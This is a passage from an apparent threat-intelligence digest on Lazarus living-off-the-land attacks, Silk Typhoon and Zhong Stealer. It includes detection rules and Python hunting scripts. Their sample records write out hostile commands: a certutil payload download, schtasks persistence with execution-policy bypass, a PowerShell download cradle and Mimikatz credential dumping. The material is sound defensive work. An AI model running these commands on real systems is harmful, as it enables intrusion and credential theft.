- Monitor unusual process behavior: implement tools like Sysmon to log detailed process creation events (Event ID 1) and analyze parent-child process relationships to identify suspicious chains (e.g., powershell.exe spawning chrome.exe).
- Detect suspicious network traffic using IDS/IPS: deploy Intrusion Detection and Prevention Systems (IDS/IPS) like Suricata and create rules to flag traffic to known threat actor infrastructure, such as the Lazarus Group IP range cited by the article: alert ip any any -> [175.45.176.0/22] any (msg:"Suspicious traffic to North Korea - Lazarus group IP"; sid:100001;)
- Detect LOTL attacks using SIEM tools: utilize Security Information and Event Management (SIEM) tools like Splunk to analyze security logs (Windows Event Logs and Sysmon) for suspicious system tool execution and password theft. Example SPL query: index=main source="WinEventLog:*" ( (process_name="*\\mimikatz.exe" AND event_id=10) OR (process_name="*\\regsvr32.exe" OR process_name="*\\rundll32.exe" NOT process_path="C:\\Windows\\System32\\*") )
- Configure alerts and automatic response actions in SIEM tools to notify security teams and automatically take actions like disabling affected user accounts or blocking suspicious processes upon detection of malicious activity.
- Implement the least privilege principle: restrict access to powerful tools like PowerShell and administrative utilities to reduce the attack surface.
- Implement network segmentation: divide the network into isolated subnets to limit lateral movement of attackers in case of a breach.
- Deploy honeypots and detection mechanisms: use fake credentials and systems to lure attackers and detect their presence within the network.
- Implement application whitelisting: block the execution of unauthorized Living Off The Land Binaries (LOLBins) like rundll32.exe.
- Maintain continuous monitoring and proactive detection: recognize that no security strategy is foolproof against LOTL attacks, and ongoing monitoring and threat hunting are crucial.
Hunting methods
- Sysmon analysis: install Sysmon with sysmon -accepteula -i, then review Event ID 1 (Process Creation) in Event Viewer (Applications and Services Logs > Microsoft > Windows > Sysmon) for unusual parent-child process relationships, such as powershell.exe spawning command-line interpreters, script hosts, or network-related processes.
- Suricata rules: add the following rule to the Suricata local.rules file: alert ip any any -> [175.45.176.0/22] any (msg:"Suspicious traffic to North Korea - Lazarus group IP"; sid:100001;)
- Splunk queries (SPL): search for Mimikatz execution and system tools running from unusual locations: index=main source="WinEventLog:*" ( (process_name="*\\mimikatz.exe" AND event_id=10) OR (process_name="*\\regsvr32.exe" OR process_name="*\\rundll32.exe" NOT process_path="C:\\Windows\\System32\\*") )
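The Sysmon step above says what to look for but not how to do it at scale; the script below is an added example (not from the article) that applies those checks, and the parent-child and LOLBin-path logic behind the Splunk query, to Sysmon Event ID 1 records in the XML form that Event Viewer or Get-WinEvent exports. It flags PowerShell spawning interpreters or LOLBins, certutil used as a downloader, schtasks persistence with -ExecutionPolicy Bypass, LOLBins running outside System32, PowerShell download cradles, and Mimikatz. SAMPLE_RECORDS are constructed from the commands quoted in this article; the user, paths and the example.invalid domain are made up.

```python
"""Hunt Sysmon Event ID 1 (process creation) records for the LOTL chains above.

Added example, not from the article. Parses Sysmon XML as exported by Event
Viewer or Get-WinEvent and applies the parent-child and LOLBin checks the
article recommends. The sample records are constructed.
"""
import html
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVT_NS}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SHELLS = {"powershell.exe", "pwsh.exe"}
INTERPRETERS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe"}
_CRADLE = re.compile(r"\biex\b|invoke-expression")


def parse_sysmon_event(xml_text: str) -> dict:
    """Flatten the <EventData><Data Name=...> elements into a {Name: value} dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def classify(ev: dict) -> list:
    """Return the rule names one process-creation record trips (possibly several)."""
    image, parent = _base(ev.get("Image", "")), _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    hits = []
    if parent in SHELLS and image in INTERPRETERS:
        hits.append("powershell-spawns-interpreter")
    if image == "certutil.exe" and "-urlcache" in cmd and "-split" in cmd:
        hits.append("certutil-download")
    if image == "schtasks.exe" and "/create" in cmd and "-executionpolicy bypass" in cmd:
        hits.append("schtasks-bypass-persistence")
    if image in LOLBINS and not ev.get("Image", "").lower().startswith(SYSTEM_DIRS):
        hits.append("lolbin-outside-system32")
    if image == "mimikatz.exe" or "invoke-mimikatz" in cmd or "sekurlsa::" in cmd:
        hits.append("mimikatz")
    if image in SHELLS and "downloadstring" in cmd and _CRADLE.search(cmd):
        hits.append("powershell-download-cradle")
    return hits


def hunt(records):
    """[(image basename, hits)] for every record, in input order."""
    return [(_base(ev.get("Image", "")), classify(ev))
            for ev in (parse_sysmon_event(x) for x in records)]


def _record(image, cmd, parent, user="CORP\\dev"):
    """Constructed Sysmon Event ID 1 XML carrying only the fields the rules read."""
    data = {"Image": image, "CommandLine": cmd, "ParentImage": parent, "User": user}
    body = "".join(f'<Data Name="{k}">{html.escape(v)}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{EVT_NS}"><System><EventID>1</EventID></System>'
            f'<EventData>{body}</EventData></Event>')


SAMPLE_RECORDS = [  # constructed; commands follow the ones quoted in the article
    _record(r"C:\Windows\System32\certutil.exe",
            r"certutil -urlcache -split -f http://malicious.com/payload.exe C:\Windows\Temp\payload.exe",
            r"C:\Users\dev\Downloads\payload.exe"),
    _record(r"C:\Windows\System32\schtasks.exe",
            r'schtasks /create /tn "WindowsUpdate" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\payload.ps1" /sc minute /mo 30',
            r"C:\Users\dev\Downloads\payload.exe"),
    _record(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/m.ps1')\"",
            r"C:\Windows\System32\svchost.exe"),
    _record(r"C:\Windows\Temp\rundll32.exe", r"rundll32.exe C:\Windows\Temp\x.dll,Start",
            r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    _record(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p",
            r"C:\Windows\System32\services.exe"),  # benign baseline
    _record(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "powershell -c \"Invoke-Mimikatz -Command 'privilege::debug sekurlsa::tokens'\"",
            r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for image, hits in hunt(SAMPLE_RECORDS):
        print(f"{image:16} {', '.join(hits) or '-'}")
```

The path check is the part most worth carrying into a real rule set: the Splunk query above excludes System32 for regsvr32 and rundll32, but a copy of the same binary in C:\Windows\Temp or a user profile is exactly what a LOTL operator drops, so compare the full Image path, not just the file name. Command-line matching on strings like -ExecutionPolicy Bypass is easy to evade with abbreviations (-ep bypass) or encoded commands; treat these rules as a starting point for hunting rather than a complete detection.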
IOC
IP Addresses:
175.45.176.0/22
URLs:
https://github.com/gentilkiwi/mimikatz/raw/master/mimikatz.ps1
File paths:
C:\Windows\Temp\payload.exe
C:\Windows\Temp\payload.ps1
C:\stolen_data\*
C:\Windows\Temp\file.zip
Process-name patterns used in the detection queries:
*\mimikatz.exe
*\regsvr32.exe
*\rundll32.exe
Expected legitimate location for regsvr32.exe and rundll32.exe: C:\Windows\System32\
Original link: https://systemweakness.com/living-off-the-land-lotl-attacks-how-north-korea-lazarus-group-hackers-exploited-windows-a46ee8fb945f
Silk Typhoon targeting IT supply chain
Summary
Microsoft Threat Intelligence has identified a shift in tactics by Silk Typhoon, a Chinese espionage group, now targeting common IT solutions like remote management tools and cloud applications to gain initial access. While they haven’t directly targeted Microsoft cloud services for initial access, they exploit unpatched applications to elevate their access in targeted organizations and conduct further malicious activities. After compromising a victim, Silk Typhoon uses stolen keys and credentials to infiltrate customer networks, where they abuse various deployed applications, including Microsoft services, to achieve their espionage objectives. Silk Typhoon is a well-resourced and technically efficient group known for quickly operationalizing exploits for zero-day vulnerabilities in edge devices and has a large targeting footprint due to their opportunistic exploitation of vulnerable public-facing devices. Since late 2024, they have been observed abusing stolen API keys and credentials from privilege access management (PAM), cloud app providers, and cloud data management companies to access downstream customer environments. They also use password spray and abuse techniques, including leveraging leaked corporate passwords found on public repositories. Silk Typhoon utilizes covert networks consisting of compromised or leased devices to obfuscate their operations and has historically exploited numerous zero-day vulnerabilities in products like Microsoft Exchange, Palo Alto Networks GlobalProtect Gateway, Citrix NetScaler, and Ivanti Pulse Connect VPN. Microsoft has notified affected customers and is publishing this information to raise awareness and provide mitigation guidance.
Technical Details
Silk Typhoon, identified as an espionage-focused Chinese state actor, exhibits technical efficiency and the capability to rapidly integrate exploits for newly discovered zero-day vulnerabilities in edge devices. This threat actor possesses a broad targeting scope, partly attributed to their opportunistic approach of acting on discoveries from vulnerability scanning, swiftly moving to exploitation upon identifying vulnerable public-facing devices.
Initial Access: Silk Typhoon achieves initial access through several methods:
- Targeting IT supply chain: They target IT providers, identity management, privileged access management, and RMM solutions. Recent activity since late 2024 involved abusing stolen API keys and credentials associated with PAM, cloud app providers, and cloud data management companies to access downstream customer environments.
- Exploitation of zero-day vulnerabilities: They develop or discover and exploit vulnerabilities in third-party services and software providers. For example, in January 2025, they exploited a zero-day vulnerability in Ivanti Pulse Connect VPN (CVE-2025-0282). Historically, they have exploited zero-day vulnerabilities in GlobalProtect Gateway on Palo Alto Networks firewalls (CVE-2024-3400), Citrix NetScaler ADC and NetScaler Gateways (CVE-2023-3519), and Microsoft Exchange Servers (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).
- Compromised credentials: They gain initial access through successful password spray attacks and other password abuse techniques, including discovering passwords on public repositories like GitHub.
Once initial access is gained, Silk Typhoon employs various tactics for post-compromise activities:
- Lateral Movement to Cloud: They move from on-premises to cloud environments by dumping Active Directory, stealing passwords from key vaults, and escalating privileges. They have been observed targeting Microsoft AADConnect (now Entra Connect) servers to escalate privileges and access both on-premises and cloud environments.
- Maintaining Persistence and Command Execution: Silk Typhoon has used a myriad of web shells since 2020 to execute commands, maintain persistence, and exfiltrate data from victim environments.
- Manipulating Service Principals/Applications: They abuse service principals and OAuth applications with administrative permissions to perform data exfiltration via MSGraph and Exchange Web Services (EWS). This includes:
- Gaining access to applications already consented within the tenant to harvest email data.
- Adding their own passwords to compromised applications.
- Potentially compromising multi-tenant applications to move across tenants and access additional resources.
- Creating Entra ID applications disguised as legitimate services or Office 365 themes to facilitate data theft.
- Data Exfiltration: They exfiltrate data related to China-based interests, US government policy and administration, and legal process and documents related to law enforcement investigations.
- Obfuscation: They utilize covert networks comprised of compromised Cyberoam appliances, Zyxel routers, and QNAP devices, as well as short-lease VPS infrastructure, to obfuscate their malicious activities.
Observed actions after successful API key theft include reconnaissance and data collection via an admin account, resetting default admin accounts, web shell implants, creation of additional users, and clearing logs.
Countries
United States and throughout the world.
Industries
Information technology (IT) services and infrastructure, remote monitoring and management (RMM) companies, managed service providers (MSPs) and affiliates, healthcare, legal services, higher education, defense, government, non-governmental organizations (NGOs), energy, and others. Victims of downstream activity have been largely in the state and local government, and the IT sector.
Recommendations
Microsoft recommends the following to detect and mitigate Silk Typhoon’s activity:
- Ensure all public-facing devices are patched, noting that patching does not remediate existing compromises.
- Validate Ivanti Pulse Connect VPN is patched for CVE-2025-0282 and run the Integrity Checker Tool, considering terminating active sessions after patching.
- Defend against legitimate application and service principal abuse by establishing strong controls and monitoring. This includes:
- Auditing the privilege level of all identities (users, service principals, Microsoft Graph Data Connect applications).
- Scrutinizing privileges of unknown or unused identities and apps with app-only permissions.
- Identifying and remediating abused OAuth apps using anomaly detection policies and App governance.
- Reviewing and removing unnecessary applications with EWS.AccessAsUser.All and EWS.full_access_as_app permissions.
- Implementing granular and scalable access using role-based access control for applications in Exchange Online if mailbox access is required.
- Monitoring for service principal sign-ins from unusual locations using the risky sign-ins and risky users reports.
- Defend against credential compromise by building credential hygiene, practicing least privilege, and reducing credential exposure. This includes:
- Implementing the Azure Security Benchmark and general best practices for securing identity infrastructure.
- Preventing on-premises service accounts from having direct cloud resource rights.
- Storing “break glass” account passwords offline and configuring honey-token activity for their usage.
- Implementing Conditional Access policies enforcing Zero Trust principles.
- Enabling risk-based user sign-in protection and automating threat response, including MFA for medium-risk sign-ins.
- Ensuring VPN access is protected using modern authentication methods.
- Identifying all multi-tenant applications, assessing permissions, and investigating suspicious sign-ins.
- Inspect log activity related to Entra Connect servers for anomalous activity.
- Inspect service principals for newly created secrets (credentials) where targeted applications have highly privileged accounts.
- Identify and analyze any activity related to newly created applications.
- Identify all multi-tenant applications and scrutinize authentications to them.
- Analyze any observed activity related to the use of Microsoft Graph or eDiscovery, particularly for SharePoint or email data exfiltration.
- Look for newly created users on devices impacted by vulnerabilities targeted by Silk Typhoon and investigate VPN logs for evidence of VPN configuration modifications or sign-in activity during the possible window of compromise of unpatched devices.
Hunting methods
- Microsoft Sentinel:
- Use the TI Mapping analytics to automatically match malicious domain indicators with workspace data. Install the Threat Intelligence solution from the Microsoft Sentinel Content Hub if not deployed.
- Utilize the following queries to detect behavior associated with Silk Typhoon:
- Anomalous password reset
- Privileged logon from new ASN
- Anomalous account creation
- Web shell activity
- Potential web shell
- Sign-in password spray
- Smart lockouts
- Credential dumping tools file artifacts
- NTDS theft
- Time series keyvault access anomaly
- Keyvault mass secret retrieval
- Suspicious sign-in by AADConnect account
- New service principal running queries
- SharePoint downloads by IP
- Anomaly of MailItem access by GraphAPI
- Use the following query to detect vulnerabilities exploited by Silk Typhoon:
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-0282")
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel
| join kind=inner (
    DeviceTvmSoftwareVulnerabilitiesKB
    | project CveId, CvssScore, IsExploitAvailable, VulnerabilitySeverityLevel, PublishedDate, VulnerabilityDescription, AffectedSoftware
) on CveId
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel, CvssScore, IsExploitAvailable, PublishedDate, VulnerabilityDescription, AffectedSoftware
- Use the following query for enumeration of Users & Groups for Lateral Movement:
DeviceProcessEvents
| where FileName == 'net.exe' and AccountName != "" and ProcessCommandLine !contains '\\' and ProcessCommandLine !contains '/add'
| where (ProcessCommandLine contains ' user ' or ProcessCommandLine contains ' group ') and (ProcessCommandLine contains ' /do' or ProcessCommandLine contains ' /domain')
| extend Target = extract("(?i)[user|group] (\"*[a-zA-Z0-9-_ ]+\"*)", 1, ProcessCommandLine)
| filter Target != ''
| project AccountName, Target, ProcessCommandLine, DeviceName, TimeGenerated
| sort by AccountName, Target
- Microsoft Defender XDR: Refer to the list of applicable detections for Silk Typhoon activity and related threats in Microsoft Defender for Endpoint, Microsoft Defender for Identity, Microsoft Defender XDR, Microsoft Defender for Cloud, and Microsoft Defender for Cloud Apps. Examples include “Silk Typhoon activity group”, “Suspicious Interactive Logon to the Entra Connect Server”, and “Unusual addition of credentials to an OAuth app”.
- Microsoft Defender Vulnerability Management: Surfaces devices affected by vulnerabilities like CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.
- Microsoft Defender External Attack Surface Management: Attack Surface Insights can indicate vulnerable devices related to CVE-2024-3400, CVE-2023-3519, and ProxyLogon (Microsoft Exchange Server vulnerabilities). Note that “[Potential]” insights require further verification.
- Microsoft Security Copilot: Customers with provisioned access can use Microsoft Security Copilot to investigate and respond to incidents and hunt for threats using relevant threat intelligence. Pre-built promptbooks are available for incident investigation, user analysis, threat actor profile, threat intelligence reports, and vulnerability impact assessment.
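The recommendations above (reviewing EWS app-only permissions, inspecting service principals for newly created secrets, identifying multi-tenant applications) can be turned into a simple inventory audit. The following Python is an added example, not code from Microsoft's blog; the inventory and its record shape are constructed for illustration, with only the signInAudience values (AzureADMyOrg, AzureADMultipleOrgs) taken from the real Entra property.

```python
"""Audit a service principal inventory for the abuse patterns described above:
EWS app-only permissions, freshly added secrets and multi-tenant apps.
Added example; the inventory is constructed and uses a simplified record
shape (only signInAudience and its values are real Entra fields)."""
from datetime import datetime, timedelta

# Permissions singled out in the recommendations.
EWS_RISKY_PERMISSIONS = {"EWS.AccessAsUser.All", "EWS.full_access_as_app"}

# Constructed sample inventory for a hypothetical tenant.
INVENTORY = [
    {"appId": "app-1", "displayName": "Mail Archiver",
     "signInAudience": "AzureADMyOrg",
     "permissions": ["EWS.full_access_as_app"],
     "passwordCredentials": [{"keyId": "k1", "startDateTime": "2024-06-01T00:00:00Z"}]},
    {"appId": "app-2", "displayName": "Office 365 Theme Sync",
     "signInAudience": "AzureADMultipleOrgs",
     "permissions": ["Mail.Read"],
     "passwordCredentials": [{"keyId": "k2", "startDateTime": "2025-03-03T10:15:00Z"}]},
    {"appId": "app-3", "displayName": "HR Portal",
     "signInAudience": "AzureADMyOrg",
     "permissions": ["User.Read"],
     "passwordCredentials": []},
]


def _parse(ts: str) -> datetime:
    """Parse an ISO-8601 UTC timestamp ending in 'Z'."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def audit(inventory, now_iso: str, secret_window_days: int = 30) -> dict:
    """Return {appId: [finding, ...]} for every app that trips a check."""
    cutoff = _parse(now_iso) - timedelta(days=secret_window_days)
    findings = {}
    for sp in inventory:
        hits = []
        risky = EWS_RISKY_PERMISSIONS.intersection(sp.get("permissions", []))
        if risky:  # EWS.* permissions the recommendations say to review
            hits.append("ews-permission:" + ",".join(sorted(risky)))
        for cred in sp.get("passwordCredentials", []):
            if _parse(cred["startDateTime"]) >= cutoff:  # secret added recently
                hits.append("new-secret:" + cred["keyId"])
        if sp.get("signInAudience") == "AzureADMultipleOrgs":  # cross-tenant reach
            hits.append("multi-tenant")
        if hits:
            findings[sp["appId"]] = hits
    return findings


if __name__ == "__main__":
    for app, hits in audit(INVENTORY, "2025-03-05T00:00:00Z").items():
        print(app, hits)
```

Every flagged app still needs a human review; a legitimate archiver may hold EWS.full_access_as_app, and the point is that such apps are inventoried and their secrets watched.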
Original link: https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/
Zhong Stealer: Technical Analysis of a Threat Targeting Fintech
Summary
This article details Zhong Stealer, a newly discovered stealer malware that targeted the cryptocurrency and fintech sectors through a phishing campaign observed from December 20 to 24, 2024. The attackers impersonated customers on chat support platforms like Zendesk, using social engineering tactics with broken Chinese language and suspicious ZIP file attachments containing malware to trick support agents into downloading and executing the malicious files. The analysis, conducted using ANY.RUN, covers the malware’s execution flow, data exfiltration to a C2 server in Hong Kong, and persistence mechanisms involving registry key modifications and scheduled tasks. The article highlights the initial lack of specific detections by antivirus solutions and emphasizes the importance of proactive behavioral analysis for identifying such threats. The malware uses multiple stages, including downloading additional components disguised as legitimate software, and employs common but effective TTPs like disabling event logging, establishing persistence via registry keys and scheduled tasks, harvesting credentials, and communicating over non-standard ports. The naming of the malware, Zhong Stealer, was inspired by the email address of the initial submitter. The article concludes with recommendations for organizations to protect themselves against this type of threat.
Technical Details
The attack begins with social engineering via chat support platforms where attackers create new, empty accounts and initiate support tickets using broken Chinese language. They attach ZIP files containing what appear to be screenshots or additional details, named with Simplified Chinese characters, such as “图片_20241224 (2).zip”, “Android 自由截图_20241220.zip”, and “Android – Screenshots2024122288jpg.zip”. These ZIP files contain executable (EXE) files named similarly, some in Simplified and others in Traditional Chinese, such as “图片_20241224.exe” and “圖片2024122288jpg.exe”.
Upon execution, the initial stage of Zhong Stealer contacts a Command and Control (C2) server located in Hong Kong, hosted by Alibaba Cloud. The malware first downloads a TXT file acting as an inventory, containing links to other malicious components: “down.exe”, “TASLogin.log”, and “TASLoginBase.dll”.
The “down.exe” file is notable as it is signed with a revoked digital certificate from Morning Leap & Cazo Electronics Technology Co., likely stolen, and masquerades as a BitDefender Security updater. This is an example of Defense Evasion (T1036.005 - Masquerading).
Once executed, “down.exe” creates a BAT file with a random 4-digit name in the user’s temporary folder (e.g., “4948.bat”). This script uses system utilities like Conhost.exe and Attrib.exe to unhide and grant execution permissions to subsequent stages, demonstrating Command and Scripting Interpreter: Windows Command Shell (T1059.003).
The malware then queries the system’s supported languages, possibly as a form of System Information Discovery (T1082) to avoid targeting specific regions, a behavior also seen in ransomware. It also establishes Persistence (TA0003) by creating a scheduled task using Task Scheduler (T1053), serving as a fallback mechanism.
Zhong Stealer proceeds with Defense Evasion: Disable or Modify Tools (T1562) by disabling trace logs. It then performs System Information Discovery (T1082), reading various registry keys to gather details such as the machine hostname, GUID, proxies, software policies, and supported languages. It also evaluates Internet Explorer/Edge security settings.
The final stage of the malware achieves primary Persistence (T1547.001) by adding a registry key at HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN.
Next, Zhong Stealer focuses on Credential Access (TA0006) by Harvesting Credentials (T1552) and browser extension data from browsers like Brave and Edge/Internet Explorer. This involves accessing local application data folders related to these browsers.
Finally, the malware communicates with its C2 server at IP address 156.245.23.188 on the non-standard port 1131 using TCP to Exfiltrate Data (TA0010). The use of a Non-Standard Port (T1571) is a common tactic to evade basic network monitoring.
The MITRE ATT&CK Matrix highlights the following techniques employed by Zhong Stealer:
- T1562: Disable or Modify Tools (Disabling Event Logging)
- T1547: Boot or Logon Autostart Execution (Registry Run Keys / Startup Folder)
- T1552: Credentials in Files
- T1053: Scheduled Task/Job
- T1571: Non-Standard Port
- T1059.003: Command and Scripting Interpreter: Windows Command Shell
- T1082: System Information Discovery
Countries
Hong Kong (as the location of the C2 server). The article does not explicitly state targeted countries beyond the general targeting of cryptocurrency and fintech sectors, which are global.
Industries
Cryptocurrency, fintech
Recommendations
- Train customer support teams to recognize phishing tactics and avoid opening suspicious file attachments in support chats.
- Restrict ZIP file execution from unverified sources and enforce zero-trust security policies to prevent unauthorized file access.
- Monitor outbound network traffic for suspicious C2 connections, especially to non-standard ports like 1131.
- Use ANY.RUN’s real-time analysis to safely detonate unknown executables, observe their behavior step by step, and extract critical IOCs before the malware can spread.
- Adopt proactive detection and analysis strategies beyond traditional antivirus solutions.
Hunting methods
The article mentions using ANY.RUN’s Interactive Sandbox for malware analysis and threat tracking. It also refers to ANY.RUN’s threat intelligence products like TI Lookup, YARA Search, and Feeds for finding IOCs. However, no specific Yara, Sigma, KQL, SPL, or other hunting queries are provided directly in the article. Security teams can leverage the identified TTPs and IOCs to develop their own hunting rules.
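As an added illustration of the last sentence (this is example code, not from the ANY.RUN article), the following Python scores hosts against the Zhong Stealer behaviours described above: the temp-folder BAT stage unhidden with attrib.exe, schtasks persistence, the HKCU Run key write and TCP traffic to port 1131. The telemetry records are constructed with a simplified field shape, not a vendor schema.

```python
"""Score hosts against the Zhong Stealer behaviours described in the text.
Added example with constructed, Sysmon-style event records; field names are
a simplified shape (host/type/image/cmdline/target/proto/dst_port), not a
vendor schema.  Hosts showing several distinct behaviours are flagged."""
import re
from collections import defaultdict
from typing import Optional

# HKCU\...\CurrentVersion\Run, the key named as the malware's primary persistence.
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\b", re.I)
# A 4-digit .bat in a Temp folder, as described for the down.exe stage.
TEMP_BAT = re.compile(r"\\temp\\\d{4}\.bat\b", re.I)
C2_PORT = 1131  # non-standard C2 port reported in the analysis

# Constructed sample telemetry for two hypothetical hosts.
EVENTS = [
    {"host": "ws01", "type": "process", "image": "C:\\Windows\\System32\\attrib.exe",
     "cmdline": 'attrib -h -s "C:\\Users\\agent\\AppData\\Local\\Temp\\4948.bat"'},
    {"host": "ws01", "type": "process", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /sc onlogon /tn Updater /tr C:\\Users\\agent\\AppData\\Local\\Temp\\down.exe"},
    {"host": "ws01", "type": "registry",
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\TASLogin"},
    {"host": "ws01", "type": "network", "proto": "tcp", "dst_port": 1131},
    {"host": "ws02", "type": "network", "proto": "tcp", "dst_port": 443},
    {"host": "ws02", "type": "process", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /query"},
]


def classify(ev: dict) -> Optional[str]:
    """Map one event to a Zhong-style behaviour label, or None if benign."""
    if ev["type"] == "process":
        img = ev["image"].lower()
        cmd = ev.get("cmdline", "")
        if img.endswith("\\attrib.exe") and TEMP_BAT.search(cmd):
            return "temp_bat_unhide"
        if img.endswith("\\schtasks.exe") and "/create" in cmd.lower():
            return "schtasks_persistence"
    elif ev["type"] == "registry" and RUN_KEY.search(ev["target"]):
        return "run_key_persistence"
    elif ev["type"] == "network" and ev.get("proto") == "tcp" and ev.get("dst_port") == C2_PORT:
        return "c2_port_1131"
    return None


def score_hosts(events) -> dict:
    """Return {host: sorted distinct behaviour labels} for hosts with any hit."""
    seen = defaultdict(set)
    for ev in events:
        label = classify(ev)
        if label:
            seen[ev["host"]].add(label)
    return {h: sorted(labels) for h, labels in seen.items()}


def suspicious_hosts(events, min_labels: int = 2) -> list:
    """Hosts showing at least min_labels distinct Zhong behaviours."""
    return sorted(h for h, labels in score_hosts(events).items() if len(labels) >= min_labels)
```

Requiring two or more distinct behaviours per host keeps a lone schtasks /create or a single port-1131 connection from paging anyone, while the full chain on one host stands out.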
IOC
Original link: https://any.run/cybersecurity-blog/zhong-stealer-malware-analysis/